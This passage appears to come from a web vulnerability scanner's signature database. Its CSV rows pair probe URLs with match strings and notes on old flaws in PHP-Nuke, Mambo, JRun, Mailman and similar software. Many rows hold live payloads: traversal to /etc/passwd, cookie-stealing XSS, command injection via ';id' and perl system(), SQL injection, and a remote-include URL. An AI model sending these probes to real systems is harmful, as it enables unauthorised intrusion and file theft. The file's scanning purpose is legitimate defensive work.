information." "generic","/imp/horde/test.php","IMP: 3.(0|1|2|2\.1)","GET","IMP version 3.0, 3.1, 3.2, or 3.2.1 are vulnerabl to Cross Site Scripting (XSS). See http://marc.theaimsgroup.com/?l=imp&m=105940167329471&w=2." "generic","/imp/horde/test.php?mode=phpinfo","PHP Version","GET","Horde allows phpinfo() to be run, which gives detailed system information." "generic","/imp/mailbox.php3?actionID=6&server=x&imapuser=x';somesql+--&pass=x","parse error","GET","IMP 2.x allows SQL injection, and reveals system information." "generic","/inc/common.load.php","200","GET","Bookmark4U v1.8.3 include files are not protected, and may contain remote source injection by using the 'prefix' variable." "generic","/inc/config.php","200","GET","Bookmark4U v1.8.3 include files are not protected, and may contain remote source injection by using the 'prefix' variable." "generic","/inc/dbase.php","200","GET","Bookmark4U v1.8.3 include files are not protected, and may contain remote source injection by using the 'prefix' variable." "generic","/inc/sendmail.inc","This program is free software","GET","Basilix allows its configuration files to be downloaded, which may include the mysql auth credentials." "generic","/include.php?path=contact.php&contact_email=\"><script>alert(document.cookie);</script>","","GET","PHPKIT is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/index.html.bak","Index of","GET","The remote server (perhaps Web602) shows directory indexes if .bak is appended to the request." "generic","/index.html~","Index of","GET","The remote server (perhaps Web602) shows directory indexes if a ~ is appended to the request." "generic","/index.php/123","Premature end of script headers","GET","Some versions of PHP reveal PHP's physical path on the server by appending /123 to the php file name." "generic","/index.php/content/advancedsearch/?SearchText=&PhraseSearchText=&SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchButton=Search","","GET","eZ publish v3 and prior allow Cross Site Scripting (XSS). CA-2000-02." "generic","/index.php/content/search/?SectionID=3&SearchText=","","GET","eZ publish v3 and prior allow Cross Site Scripting (XSS). CA-2000-02." "generic","/index.php/\"><","","GET","eZ publish v3 and prior allow Cross Site Scripting (XSS). CA-2000-02." "generic","/index.php?action=search&searchFor=\">","","GET","MiniBB http://www.minibb.net is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/index.php?action=storenew&username=","","GET","SunShop is vulnerable to Cross Site Scripting (XSS) in the signup page. CA-200-02." "generic","/index.php?catid=<script>alert('Vulnerable')</script>","","GET","PostNuke is vulnerable to cross site scripting (XSS). CA-2000-02." "generic","/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc","resolv.conf","GET","phpMyExplorer Allows attackers to read directories on the server." "generic","/index.php?dir=","","GET","Auto Directory Index 1.2.3 and prior are vulnerable to CSS attacks." "generic","/index.php?download=/etc/passwd","root:","GET","Snif 1.2.4 allows any file to be retrieved from the web server." "generic","/index.php?download=/windows/win.ini","[windows]","GET","Snif 1.2.4 allows any file to be retrieved from the web server." "generic","/index.php?download=/winnt/win.ini","[fonts]","GET","Snif 1.2.4 allows any file to be retrieved from the web server." "generic","/index.php?file=index.php","Fatal error:","GET","PHPNuke 5.4 allows file system paths to be shown in error messages." "generic","/index.php?file=Liens&op=\">","","GET","Nuked-klan 1.3b is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd","root:","GET","Portix-PHP Portal allows retrieval of arbitrary files via the '..' type filtering problem." "generic","/index.php?module=My_eGallery","200","GET","My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection." "generic","/index.php?option=search&searchword=","","GET","Mambo Site Server 4.0 build 10 is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/index.php?page=../../../../../../../../../../boot.ini","boot loader","GET","The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host. (probably Rocket, but could be any index.php)" "generic","/index.php?page=../../../../../../../../../../etc/passwd","root:","GET","The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host. (probably Rocket, but could be any index.php)" "generic","/index.php?sql_debug=1","SQL query: ","GET","The PHP-Nuke install may allow attackers to enable debug mode and disclose sensitive information by adding sql_debug=1 to the query string." "generic","/index.php?top_message=<script>alert(document.cookie)</script> ","200","GET","Led-Forums allows any user to change the welcome message, and it is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/index.php?vo=">","","GET","Ralusp Sympoll 1.5 is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/index.php?|=../../../../../../../../../etc/passwd","root:","GET","Portix-PHP Portal allows retrieval of arbitrary files via the '..' type filtering problem." "generic","/instantwebmail/message.php","200","GET","Instant Web Mail (http://understroem.kdc/instantwebmail/) is installed. Versions 0.59 and lower can allow remote users to embed POP3 commands in URLs contained in email." "generic","/interchange/","200","GET","Interchange chat is installed. Look for a high-numbered port like 20xx to find it running." "generic","/internal.sws?../../winnt/win.ini","[fonts]","GET","Snowblind Web Server v1.0 allows arbitrary files to be retrieved from the remote server." "generic","/internal.sws?../../winnt/win.ini","[windows]","GET","Snowblind Web Server v1.0 allows arbitrary files to be retrieved from the remote server." "generic","/interscan/cgi-bin/FtpSave.dll?I'm%20Here","These settings have been saved","GET","Multiple files in the Interscan management server allow attackers to change settins without auth. Upgrade to the latest version of the Interscan product." "generic","/ip.txt","200","GET","This may be User Online from http://www.elpar.net version 2.0, which has a remotely accessible log file." "generic","/isapi/count.pl?","200","GET","AN HTTPd default script may allow writing over arbitrary files with a new content of '1', which could allow a trivial DoS. Append /../../../../../ctr.dll to replace this file's contents, for example." "generic","/isapi/testisa.dll?check1=","","GET","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/isqlplus","200","GET","Oracle iSQL*Plus is installed. This may be vulnerable to a buffer overflow in the user id field. http://www.ngssoftware.com/advisories/ora-isqlplus.txt" "generic","/jamdb/","200","GET","JamDB pre 0.9.2 mp3.php and image.php can allow user to read arbitrary file out of docroot." "generic","/java-plugin/","index of","GET","Default directory found." "generic","/java-sys/","200","GET","Default Java directory should not allow directory listing." "generic","/javadoc/","200","GET","Documentation...?" "generic","/javax","index of","GET","Java class files may be browsable." "generic","/jgb_eng_php3/cfooter.php3","Fatal error","GET","Justice Guestbook may reveal file system paths in error messages." "generic","/jigsaw/","200","GET","Jigsaw server may be installed. Versions lower than 2.2.1 are vulnerable to Cross Site Scripting (XSS), update to latest at http://freshmeat.net/users/yveslafon/. CA-2000-02." "generic","/Jigsaw/","200","GET","Jigsaw server may be installed. Versions lower than 2.2.1 are vulnerable to Cross Site Scripting (XSS), update to latest at http://freshmeat.net/users/yveslafon/. CA-2000-02." "generic","/jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../boot.ini","boot loader","GET","Default JRun CGI lets users read any system file." "generic","/jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../etc/passwd","root:","GET","Default JRun CGI lets users read any system file." "generic","/jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../boot.ini","boot loader","GET","The JRUN view_source.jsp allows arbitrary file retrieval from the host. Upgrade to JRUN 2.3.3 or higher, or remove all default scripts. CVE-2000-0540. BID-1386." "generic","/jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../etc/passwd","root:","GET","The JRUN view_source.jsp allows arbitrary file retrieval from the host. Upgrade to JRUN 2.3.3 or higher, or remove all default scripts. CVE-2000-0540. BID-1386." "generic","/jspdocs/","OracleJSP","GET","Default Oracle JSP documentation." "generic","/JUNK(5).csp","File not found: /","GET","Invalid files with .csp extension reveal the file system path to the web root." "generic","/JUNK(6).cfm?mode=debug","Execution Time","GET","Coldfusion debug information contains sensitive information and can be viewed by appending ?Mode=debug at the end of the request." "generic","/k/home?dir=/&file=../../../../../../../../etc/passwd&lang=kor","root:","GET","Kebi Academy 2001 Web Solution allows any file to be retrieved from the remote system." "generic","/kboard/","200","GET","KBoard Forum 0.3.0 and prior have a security problem in forum_edit_post.php, forum_post.php and forum_reply.php" "generic","/krysalis/","200","GET","Krysalis pre 1.0.3 may allow remote users to read arbitrary files outside docroot" "generic","/launch.asp?NFuse_Application=","","GET","NFuse is vulnerable to cross site scripting (XSS) in the GetLastError function. Upgrade to the latest version. CA-2000-02." "generic","/launch.jsp?NFuse_Application=","","GET","NFuse is vulnerable to cross site scripting (XSS) in the GetLastError function. Upgrade to the latest version. CA-2000-02." "generic","/ldap/cgi-bin/ldacgi.exe?Action=","","GET","IBM Directory Server 4.1 Web Admin, ldacgi.exe is vulnerable to CSS/XSS attack." "generic","/level/42/exec/show%20conf","200","GET","Retrieved Cisco configuration file." "generic","/lists/admin/","200","GET","PHPList pre 2.6.4 contains a number of vulnerabilities including remote administrative access, harvesting user info and more. Default login to admin interface is admin/phplist" "generic","/log/","200","GET","Ahh...log information...fun!" "generic","/logbook.pl?file=../../../../../../../bin/cat%20/etc/passwd%00|","root:","GET","Wordit Limited 2000 allows command execution." "generic","/logicworks.ini","200","GET","web-erp 0.1.4 and earlier allow .ini files to be read remotely." "generic","/login.php?sess=your_session_id&abt=&new_lang=99999&caller=navlang","Failed opening required","GET","phPay v2.02 information disclosure. http://phpay.sourceforge.net/." "generic","/login/sm_login_screen.php?error=\">","","GET","SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/login/sm_login_screen.php?uid=\">","","GET","SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/logins.html","Below are the usernames and passwords","GET","The Divine/OpenMarket Content Server lists the default user names and passwords set up with the server." "generic","/logjam/showhits.php","200","GET","Logjam may possibly allow remote command execution via showhits.php page." "generic","/lpt9.xtp","java.io.FileNotFoundException:","GET","Resin 2.1 reveals the server path when a DOS device is requested." "generic","/mail/addressaction.html?id=&newaddress=1&addressname=&addressemail=junk@example.com","","GET","IceWarp Webmail 3.3.3 is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/mailman/admin/ml-name?\">;","","GET","Mailmain is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/mailman/listinfo/","","GET","Mailman is vulnerable to Cross Site Scripting (XSS). Upgrade to version 2.0.8 to fix. CA-2000-02." "generic","/mailman/options/yourlist?language=en&email=<SCRIPT>alert('Vulnerable')</SCRIPT>","","GET","Mailmain 2.1 is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/mailman/options/yourlist?language=en&email=<SCRIPT>alert('Vulnerable')</SCRIPT>","","GET,","Mailmain 2.1 is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/mall_log_files/order.log","200","GET","EZMall2000 exposes order information, http://www.ezmall2000.com/, see http://www.mindsec.com/advisories/post2.txt for details." "generic","/mambo/administrator/phpinfo.php","200","GET","Mambo Site Server 4.0.11 phpinfo.php script reveals system information." "generic","/mambo/index.php?Itemid=JUNK(5)","exceeded in /","GET","Mambo Site Server 4.0.11 reveals the web server path." "generic","/manager/","200","GET","May be a web server or site manager." "generic","/manual.php","200","GET","Does not filter input before passing to shell command. Try 'ls -l' as the man page entry." "generic","/manual/","200","GET","Web server manual? tsk tsk." "generic","/master.password","200","GET","Passwords?" "generic","/mcartfree/database/metacart.mdb","200","GET","MetaCart2 is an ASP shopping cart. The database of customers is available via the web."," " "generic","/megabook/admin.cgi?login=","","GET","Megabook guestbook is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/megabook/files/20/setup.db","200","GET","Megabook guestbook configuration available remotely." "generic","/Mem/dynaform/Login.htm?WINDWEB_URL=%2FMem%2Fdynaform%2FLogin.htm&ListIndexUser=0&sWebParam1=admin000","Login as Admin successful","POST","Meridian Integrated Recorded Announcer default account admin/admin000 enabled" "generic","/members.asp?SF=%22;}alert('Vulnerable');function%20x(){v%20=%22","alert('Vulnerable')","GET","Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/metacart/database/metacart.mdb","200","GET","MetaCart2 is an ASP shopping cart. The database of customers is available via the web." "generic","/midicart.mdb","200","GET","MIDICART database is available for browsing. This should not be allowed via the web server." "generic","/MIDICART/midicart.mdb","200","GET","MIDICART database is available for browsing. This should not be allowed via the web server." "generic","/mlog.phtml","200","GET","Remote file read vulnerability CVE-1999-0346" "generic","/modsecurity.php","200","GET","This phpWebSite script may allow inclusion of remote scripts by adding ?inc_prefix=http://YOURHOST/" "generic","/modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index","javascript:alert(document.cookie);","GET","Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/modules.php?name=Classifieds&op=ViewAds&id_subcatg=75&id_catg=","","GET","The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/modules.php?name=Downloads&d_op=viewdownload","Failed opening","GET","PHPNuke allows file system paths to be revealed." "generic","/modules.php?name=Downloads&d_op=viewdownload","Fatal error","GET","PHPNuke allows file system paths to be revealed." "generic","/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=02&ttitle=","","GET","This install of PHPNuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/modules.php?name=Members_List&letter=All&sortby=pass","Admin","GET","PHP Nuke module allows user names and passwords to be viewed. See http://www.frog-man.org/tutos/PHP-Nuke6.0-Members_List-Your_Account.txt for other SQL exploits in this module." "generic","/modules.php?name=Members_List&sql_debug=1","SQL query: ","GET","The PHP-Nuke install may allow attackers to enable debug mode and disclose sensitive information by adding sql_debug=1 to the query string." "generic","/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","uid=","GET","PHP-Nuke add-on NetTools below 0.3 allow for command execution. Upgrade to a new version." "generic","/modules.php?name=Stories_Archive&sa=show_month&year=2002&month=03&month_l=","","GET","The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/modules.php?name=Stories_Archive&sa=show_month&year=&month=3&month_l=test","","GET","The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/modules.php?name=Surveys&pollID=","","GET","The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/modules.php?name=Your_Account&op=userinfo&uname=","","GET","The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/modules.php?name=Your_Account&op=userinfo&username=bla","","GET","Francisco Burzi PHP-Nuke 5.6, 6.0, 6.5 RC1/RC2/RC3, 6.5 is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/modules.php?op=modload&name=0&file=0","Failed opening ","GET","PHP Nuke is configured to give descriptive error messages which can reveal file system paths." "generic","/modules.php?op=modload&name=books&file=index&req=search&query=|script|alert(document.cookie)|/script|","","","GET","The DMOZGateway (PHPNuke Add-on module) is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg%20src=javascript:alert(document.cookie);%3E&parent_id=0","javascript:alert(document.cookie)","GET","Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/modules.php?op=modload&name=Guestbook&file=index&entry=","","GET","The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/modules.php?op=modload&name=Members_List&file=index&letter=","","GET","This install of PHPNuke's modules.php is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/modules.php?op=modload&name=News&file=article&sid=","","GET","Postnuke is vulnerable to Cross Site Scripting. CA-2000-02." "generic","/modules.php?op=modload&name=News&file=index&catid=&topic=>;","","GET","Postnuke is vulnerable to Cross Site Scripting. CA-2000-02." "generic","/modules.php?op=modload&name=Sections&file=index&req=viewarticle&artid=","non-object in","GET","Postnuke v0.7.2.3-Phoenix and below reveal the file system path." "generic","/modules.php?op=modload&name=WebChat&file=index&roomid=","","GET","The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink","Failed opening ","GET","PHP Nuke is configured to give descriptive error messages which can reveal file system paths." "generic","/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=","","GET","The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/modules.php?op=modload&name=Wiki&file=index&pagename=","","GET","Wiki PostNuke Module is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/modules.php?op=modload&name=Xforum&file=&fid=2","","GET","The XForum (PHPNuke Add-on module) is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/modules.php?op=modload&name=Xforum&file=member&action=viewpro&member=","","GET","The XForum (PHPNuke Add-on module) is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../../../../etc/passwd","root:","GET","Gallery Addon for PhpNuke allows files to be read remotely. CAN-2001-0900." "generic","/modules/Forums/bb_smilies.php?bgcolor1=\">","","GET","PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/modules/Forums/bb_smilies.php?Default_Theme=","","GET","PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/modules/Forums/bb_smilies.php?name=","","GET","PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/modules/Forums/bb_smilies.php?site_font=}-->","","GET","PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/modules/Submit/index.php?op=pre&title=","","","GET","The Sendmail Server Site Domain Administrator login is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/msadm/site/index.php3?authid=\">","","GET","The Sendmail Server Site Administrator Login is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/msadm/user/login.php3?account_name=\">","","GET","The Sendmail Server Site User login is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/musicqueue.cgi","200","GET","Musicqueue 1.20 is vulnerable to a buffer overflow. Ensure the latest version is installed (exploit not attempted). http://musicqueue.sourceforge.net/" "generic","/myhome.php?action=messages&box=","","GET","OpenBB 1.0.0 RC3 is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/myinvoicer/config.inc","System settings","GET","MyInvoicer prior to 1.0.2 allowed remote user to read source of config file, possibly leaking sensitive information or passwords." "generic","/mylog.phtml?screen=/etc/passwd","root:","GET","Remote file read vulnerability CVE-1999-0346" "generic","/myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent","","","GET","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/netutils/findata.stm?user=","","GET","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/netutils/ipdata.stm?ipaddr=","","GET","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/netutils/whodata.stm?sitename=","","GET","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/news/news.mdb","200","GET","Web Wiz Site News realease v3.06 admin password database is available and unencrypted." "generic","/newuser?Image=../../database/rbsserv.mdb","SystemErrorsPerHour","GET","The Extent RBS ISP 2.5 allows attackers to read arbitrary files on the server." "generic","/node/view/666\">","","GET","Drupal 4.2.0 RC is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/nph-showlogs.pl?files=../../../../../../../../etc/&filter=.*&submit=Go&linecnt=500&refresh=0","passwd","GET","nCUBE Server Manage 1.0 allows directory listings of any location on the remote system." "generic","/nph-showlogs.pl?files=../../../../../../../../etc/passwd&filter=.*&submit=Go&linecnt=500&refresh=0","root:","GET","nCUBE Server Manage 1.0 allows any file to be read on the remote system." "generic","/nuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","uid=","GET","PHP-Nuke add-on NetTools below 0.3 allow for command execution. Upgrade to a new version." "generic","/oekaki/",".conf","GET","The PaintBBS Server may allow unauthorized access to the config files." "generic","/officescan/hotdownload/ofscan.ini","200","GET","OfficeScan from Trend Micro allows anyone to read the ofscan.ini file, which may contain passwords." "generic","/ojspdemos/basic/hellouser/hellouser.jsp","200!License Exception","GET","Oracle 9i default jsp page found, may be vulnerable to XSS in any field." "generic","/ojspdemos/basic/simple/usebean.jsp","200!License Exception","GET","Oracle 9i default jsp page found, may be vulnerable to XSS in any field." "generic","/ojspdemos/basic/simple/welcomeuser.jsp","200!License Exception","GET","Oracle 9i default jsp page found, may be vulnerable to XSS in any field." "generic","/openautoclassifieds/friendmail.php?listing=<script>alert(document.domain);</script>","","GET","OpenAutoClassifieds 1.x is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/openautoclassifieds/friendmail.php?listing=","200","GET","OpenAutoClassifieds 1.0 is vulnerable to a CSS/XSS attack" "generic","/opendir.php?/etc/passwd","root:","GET","This PHP-Nuke CGI allows attackers to read any file on the web server. CVE-2001-0321" "generic","/opendir.php?requesturl=/etc/passwd","root:","GET","This PHP-Nuke CGI allows attackers to read any file on the web server. CVE-2001-0321" "generic","/oprocmgr-status","Module Name","GET","Oracle 9iAS default install allows access to the Java Process Manager." "generic","/options.php?optpage=","include_path","GET","This Squirrel Mail 1.2.7 reveals the PHP path information in error messages." "generic","/order/order_log.dat","200","GET","Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt" "generic","/order/order_log_v12.dat","200","GET","Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt" "generic","/Orders/order_log.dat","200","GET","Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt" "generic","/orders/order_log.dat","200","GET","Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt" "generic","/Orders/order_log_v12.dat","200","GET","Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt" "generic","/orders/order_log_v12.dat","200","GET","Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt" "generic","/ows-bin/perlidlc.bat?&dir","ows-bin:","GET","The Oracle web listener can be used to execute remote commands. http://www.securiteam.com/windowsntfocus/Oracle_Web_Listener_4_0_x_CGI_vulnerability.html" "generic","/ows/restricted%2eshow","200","GET","OWS may allow restricted files to be viewed by replacing a character with its encoded equivalent." "generic","/pafiledb/includes/team/file.php","200","GET","paFileDB 3.1 and below may allow file upload without authentication." "generic","/page.cgi?../../../../../../../../../../etc/passwd","root:","GET","WWWeBBB Forum up to version 3.82beta allow arbitrary file retrieval." "generic","/Page/1,10966,,00.html?var=","","GET","Vignette server is vulnerable to Cross Site Scripting (XSS). CA-2000-02. Upgrade to the latest version." "generic","/pages/htmlos/%3Cscript%3Ealert('Vulnerable');%3C/script%3E","","GET","Aestiva HTML/OS is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/passwdfile","200","GET","Passwords?" "generic","/password.inc","globalpw","GET","GTCatalog 0.9 admin password was retrieved remotely." "generic","/path/nw/article.php?id='","c:/","GET","News Wizard 2.0 reveals the file system path." "generic","/path/nw/article.php?id='","d:/","GET","News Wizard 2.0 reveals the file system path." "generic","/pccsmysqladm/incs/dbconnect.inc","200","GET","This file should not be accessible, as it contains database connectivity information. Upgrade to version 1.2.5 or higher." "generic","/PDG_Cart/oder.log","200","GET","Shopping cart software log" "generic","/PDG_Cart/shopper.conf","Authnet_Login","GET","PDGSoft's PDG Shopping Cart 1.5 �http://www.pdgsoft.com/ , Shopping cart software log, http://www.mindsec.com/advisories/post2.txt" "generic","/people.lst","200","GET","Passwords?" "generic","/perl/","Index of ","GET","This should probably not be browsable." "generic","/perl/-e%20%22system('cat%20/etc/passwd');\%22","root:","GET","The installed perl interpreter allows any command to be executed remotely." "generic","/pforum/edituser.php?boardid=&agree=1&username=%3Cscript%3Ealert('Vulnerable')%3C/script%3E&nickname=test&email=test@example.com&pwd=test&pwd2=test&filled=1","","GET","Pforum 1.14 is vulnerable to Cross Site Scripting (XSS). CA-2000-02" "generic","/phorum/admin/footer.php?GLOBALS[message]=","","GET","Phorum 3.3.2a and below from phorum.org is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/phorum/admin/header.php?GLOBALS[message]=","","GET","Phorum 3.3.2a and below from phorum.org is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/phorum/admin/stats.php","Phorum Stats","GET","PHP based forum script Phorum allows a user to retrieve the top ten active users, including email addresses. Delete the script or pass protect it." "generic","/photo/manage.cgi","200","GET","My Photo Gallery management interface. May allow full access to photo galleries and more." "generic","/photodata/manage.cgi","200","GET","My Photo Gallery management interface. May allow full access to photo galleries and more." "generic","/photo_album/","200","GET","Atomic Photo Album pre 1.0.3 had a 'few' security problems." "generic","/php-coolfile/action.php?action=edit&file=config.php","200","GET","PHP-Coolfile 1.4 allows unauthorized administrative access." "generic","/php-coolfile/action.php?action=edit&file=config.php","pass_1","GET","PHP-Coolfile 1.4 may allow any user to read the config.php file." "generic","/php.ini","200","GET","This file should not be available through the web interface." "generic","/php/index.php","200","GET","Monkey Http Daemon default php file found." "generic","/php/mlog.phtml","200","GET","Remote file read vulnerability CVE-1999-0346" "generic","/php/mylog.phtml?screen=/etc/passwd","root:","GET","Remote file read vulnerability CVE-1999-0346" "generic","/php/php.exe?c:\winnt\boot.ini","boot loader","GET","Apache/PHP installations can be misconfigured (according to documentation) to allow files to be retrieved remotely." "generic","/phpBB/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK","root:","GET","The PHPNuke admin.php is vulnerable to a remote file retrieval vul. It should be upgraded to the latest version. CAN-2001-0320" "generic","/phpBB/phpinfo.php","200","GET","phpBBmod contains an enhanced version of the phpinfo.php script. This should be removed as it contains detailed system information." "generic","/phpBB/viewtopic.php?t=17071&highlight=\">\"","","GET","phpBB is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/phpBB/viewtopic.php?topic_id=","","GET","ph